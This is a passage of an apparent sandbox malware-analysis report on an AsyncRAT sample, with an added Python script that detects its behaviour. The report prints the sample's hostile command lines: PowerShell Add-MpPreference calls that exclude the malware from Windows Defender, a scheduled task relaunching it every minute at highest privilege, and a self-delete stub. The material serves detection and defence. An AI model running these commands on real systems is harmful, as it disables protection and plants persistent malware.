                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 33_2_01940C70
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 33_2_01940C60
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 33_2_0194EF90
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 33_2_0194D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 33_2_02391BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 33_2_02392488
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 33_2_02391870
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 33_2_06568C18
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 33_2_0656F400
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 37_2_0328EF90
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 37_2_0328D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 37_2_03280C60
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 37_2_03280C70
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 37_2_06241BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 37_2_06242488
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 37_2_06241870
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 37_2_06308C18
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 37_2_0630F400
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 40_2_01850C60
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 40_2_01850C70
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 40_2_0185EF90
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 40_2_0185D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exe | Code function: 40_2_060A1BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_060A248840_2_060A2488
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_060A187040_2_060A1870
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_06168C1840_2_06168C18
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_0616F40040_2_0616F400
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 43_2_0300D3E843_2_0300D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 43_2_03000C6043_2_03000C60
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 43_2_03000C7043_2_03000C70
Source: C:\Users\user\AppData\Roaming\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 1216
Source: file.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs file.exe
Source: file.exe, 00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameksWKMie8Xgh4uo4.exe4 vs file.exe
Source: file.exe, 00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameksWKMie8Xgh4uo4.exe4 vs file.exe
Source: file.exe, 00000000.00000002.1753213995.000000000137E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1754386213.0000000003241000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000001.00000002.4215160778.0000000006429000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
Source: file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs file.exe
Source: file.exe, 0000000E.00000002.2241827212.0000000003431000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 0000000E.00000002.2228777015.00000000017BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000016.00000002.2202609553.0000000000948000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename[ vs file.exe
Source: file.exe, 00000016.00000002.2211795636.0000000002701000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameksWKMie8Xgh4uo4.exe4 vs file.exe
Source: file.exe.0.dr | Binary or memory string: OriginalFilenameksWKMie8Xgh4uo4.exe4 vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: file.exe, -----------.cs | Cryptographic APIs: 'CreateDecryptor'
Source: file.exe, -----------.cs | Cryptographic APIs: 'CreateDecryptor'
Source: file.exe, -----------.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.5e50000.3.raw.unpack, -----------.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.5e50000.3.raw.unpack, -----------.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.5e50000.3.raw.unpack, -----------.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.3719ccc.0.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.3719ccc.0.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.3719ccc.0.raw.unpack, ub7IeQ5sqWntl1qadx7oq8YPwaBWDRNX9iR60l23xp96M8SJ85dQZQ0Jlyoi3nwkDA9WIIBOt0Hb0HYwHI.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.372e50c.1.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.372e50c.1.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.3719ccc.0.raw.unpack, JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.cs | Base64 encoded string: 'qAq30AxffhrvXLBhF/J54DxsrJez/5pcJX28TuK2xIchlZzEPe82Pg48Pkom/jcV'
Source: 0.2.file.exe.372e50c.1.raw.unpack, JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.cs | Base64 encoded string: 'qAq30AxffhrvXLBhF/J54DxsrJez/5pcJX28TuK2xIchlZzEPe82Pg48Pkom/jcV'
Source: 0.2.file.exe.3719ccc.0.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.3719ccc.0.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.372e50c.1.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.372e50c.1.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@39/52@2/3
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6184
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4040
Source: C:\Users\user\WindowsUpdaterConf.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5780
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6024
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3020
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:332:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\4jKORaOV68phsKu6
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5960
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5688
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c timeout /t 1 && DEL /f file.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'
Source: unknown | Process created: C:\Users\user\AppData\Roaming\file.exe "C:\Users\user\AppData\Roaming\file.exe"
Source: C:\Users\user\AppData\Roaming\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 1216
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\file.exe "C:\Users\user\AppData\Roaming\file.exe"
Source: C:\Users\user\AppData\Roaming\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 1140
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\WindowsUpdaterConf.exe C:\Users\user\WindowsUpdaterConf.exe
Source: C:\Users\user\WindowsUpdaterConf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 1204
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Users\user\WindowsUpdaterConf.exe "C:\Users\user\WindowsUpdaterConf.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6184 -ip 6184
Source: C:\Users\user\WindowsUpdaterConf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 1144
Source: unknown | Process created: C:\Users\user\WindowsUpdaterConf.exe "C:\Users\user\WindowsUpdaterConf.exe"
Source: C:\Users\user\WindowsUpdaterConf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1164
Source: unknown | Process created: C:\Users\user\WindowsUpdaterConf.exe C:\Users\user\WindowsUpdaterConf.exe
Source: C:\Users\user\WindowsUpdaterConf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1148
Source: unknown | Process created: C:\Users\user\WindowsUpdaterConf.exe C:\Users\user\WindowsUpdaterConf.exe
Source: C:\Users\user\WindowsUpdaterConf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 1132
Source: unknown | Process created: C:\Users\user\WindowsUpdaterConf.exe C:\Users\user\WindowsUpdaterConf.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c timeout /t 1 && DEL /f file.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
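The process-creation chain listed above is the part of this report an endpoint detection would key on: the sample spawns a second copy of itself, launches a cmd "timeout && DEL" stub to remove the original, runs four PowerShell Add-MpPreference commands (under -ExecutionPolicy Bypass) to exclude both its own path and the dropped WindowsUpdaterConf.exe from Windows Defender, and registers a scheduled task with /RL HIGHEST that re-launches the dropped file every minute. The Python below is an added example and is not part of the Joe Sandbox report or of the sample; it transcribes those command lines into constructed Sysmon-style process events (paths and parent/child pairs copied from the list above, plus two invented benign events as negative controls) and runs four detection rules over them. The rule names, the event shape, the five-minute interval cutoff and the treatment of self-spawn as low severity are assumptions of this example, not something the report states.

```python
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon EID 1 / Security 4688 style)."""
    parent: str    # full path of the parent image
    image: str     # full path of the created image
    cmdline: str   # command line of the created process


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Rule patterns. Matching is case-insensitive because cmd and PowerShell are.
DEFENDER_EXCLUSION = re.compile(
    r"add-mppreference\b.*?-exclusion(path|process|extension|ipaddress)", re.I)
EXEC_POLICY_BYPASS = re.compile(r"-exec(utionpolicy)?\s+bypass", re.I)
SCHTASKS_CREATE = re.compile(r"/create\b", re.I)
SCHTASKS_HIGHEST = re.compile(r"/rl\s+highest", re.I)
SCHTASKS_MINUTE = re.compile(r"/sc\s+minute(?:\s+/mo\s+(\d+))?", re.I)
SCHTASKS_ACTION = re.compile(r'/tr\s+"?([^"]+)"?', re.I)
SELF_DELETE = re.compile(r"\btimeout\b.*?&&\s*del\b", re.I)
USER_PROFILE = re.compile(r"^[a-z]:\\users\\", re.I)


def check_event(ev: ProcEvent) -> list[Finding]:
    """Apply every rule to one event and return the findings it triggers."""
    out: list[Finding] = []
    img = _basename(ev.image)
    cmd = ev.cmdline

    # 1. PowerShell adding a Defender exclusion. Admins do this too, so the
    #    parent image is the context that matters: here it is an executable
    #    on the user's Desktop, not an admin console or a deployment tool.
    if img == "powershell.exe" and DEFENDER_EXCLUSION.search(cmd):
        detail = f"Defender exclusion added by {_basename(ev.parent)}"
        if EXEC_POLICY_BYPASS.search(cmd):
            detail += " with -ExecutionPolicy Bypass"
        out.append(Finding("defender_exclusion", ev.image, detail))

    # 2. schtasks persistence: highest privileges, a very short repeat
    #    interval (assumed cutoff: 5 minutes), or an action inside a user profile.
    if img == "schtasks.exe" and SCHTASKS_CREATE.search(cmd):
        reasons = []
        if SCHTASKS_HIGHEST.search(cmd):
            reasons.append("runs at highest privilege")
        m = SCHTASKS_MINUTE.search(cmd)
        if m:
            interval = int(m.group(1)) if m.group(1) else 1
            if interval <= 5:
                reasons.append(f"repeats every {interval} minute(s)")
        a = SCHTASKS_ACTION.search(cmd)
        if a and USER_PROFILE.match(a.group(1).strip()):
            reasons.append("action lives under C:\\Users")
        if reasons:
            out.append(Finding("schtasks_persistence", ev.image, "; ".join(reasons)))

    # 3. Self-deletion stub: cmd waits for the parent to exit, then deletes it.
    if img == "cmd.exe" and SELF_DELETE.search(cmd):
        out.append(Finding("self_delete", ev.image,
                           "timeout && del launched by " + _basename(ev.parent)))

    # 4. A process starting a second copy of its own image. Weak on its own
    #    (browsers do it), but it is the usual prelude to hollowing the child.
    if ev.parent.lower() == ev.image.lower():
        out.append(Finding("self_spawn", ev.image, "image spawned itself"))

    return out


def scan(events) -> list[Finding]:
    return [f for ev in events for f in check_event(ev)]


def summarize(findings) -> dict[str, int]:
    """Count findings per rule name."""
    return dict(Counter(f.rule for f in findings))


# Constructed sample: the chain from the report, plus two benign controls.
DESKTOP_EXE = r"C:\Users\user\Desktop\file.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_PREFIX = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference '

SAMPLE_EVENTS = [
    ProcEvent(DESKTOP_EXE, DESKTOP_EXE, f'"{DESKTOP_EXE}"'),
    ProcEvent(DESKTOP_EXE, r"C:\Windows\SysWOW64\cmd.exe", r'"cmd" /c timeout /t 1 && DEL /f file.exe'),
    ProcEvent(DESKTOP_EXE, PS, PS_PREFIX + "-ExclusionPath 'C:\\Users\\user\\Desktop\\file.exe'"),
    ProcEvent(DESKTOP_EXE, PS, PS_PREFIX + "-ExclusionProcess 'file.exe'"),
    ProcEvent(DESKTOP_EXE, PS, PS_PREFIX + "-ExclusionPath 'C:\\Users\\user\\WindowsUpdaterConf.exe'"),
    ProcEvent(DESKTOP_EXE, PS, PS_PREFIX + "-ExclusionProcess 'WindowsUpdaterConf.exe'"),
    ProcEvent(DESKTOP_EXE, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 1"),
    # Invented benign events (not from the report); neither should fire.
    ProcEvent(r"C:\Windows\explorer.exe", PS, '"powershell.exe" Get-MpPreference'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc daily /tn Backup /tr "C:\Program Files\Backup\run.exe"'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.detail}")
    print(summarize(scan(SAMPLE_EVENTS)))
```

Run against the constructed events this yields seven findings (four Defender exclusions, one scheduled task, one self-delete, one self-spawn) and nothing for the two benign controls. In production the parent-image check is what keeps rule 1 quiet: Add-MpPreference launched from an admin console, SCCM or Intune is routine, the same cmdlet launched by an unsigned binary under C:\Users is not.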
Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntshrui.dll
